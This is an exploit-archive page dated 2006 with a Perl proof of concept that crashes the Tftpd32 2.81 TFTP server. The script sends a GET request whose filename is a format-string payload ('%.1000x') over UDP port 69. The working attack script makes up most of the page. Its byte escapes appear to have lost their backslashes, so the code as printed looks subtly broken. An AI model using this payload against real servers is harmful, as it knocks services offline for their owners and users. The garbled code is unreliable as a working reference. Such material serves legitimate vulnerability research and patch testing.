Tftpd32 2.81 (GET Request) Format String Denial of Service PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Tftpd32 2.81 (GET Request) Format String Denial of Service PoC
# Published : 2006-01-19
# Author : Critical Security
# Previous Title : Cisco Aironet Wireless Access Points Memory Exhaustion ARP Attack DoS
# Next Title : MS Internet Explorer <= 6.x (IMG / XML elements) Denial of Service

#!/usr/bin/perl
# Tftpd32 Format String PoC DoS by Critical Security research http://www.critical.lt
use IO::Socket;
$port = "69";
$host = "127.0.0.1";
$tftpudp = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');
$bzz = "x00x01" ;   #GET
$bzz .= "%.1000xx00";
$bzz .= "x6Fx63x74x65x74x00"; #octet
$tftpudp->send($bzz);

# www.Syue.com [2006-01-19]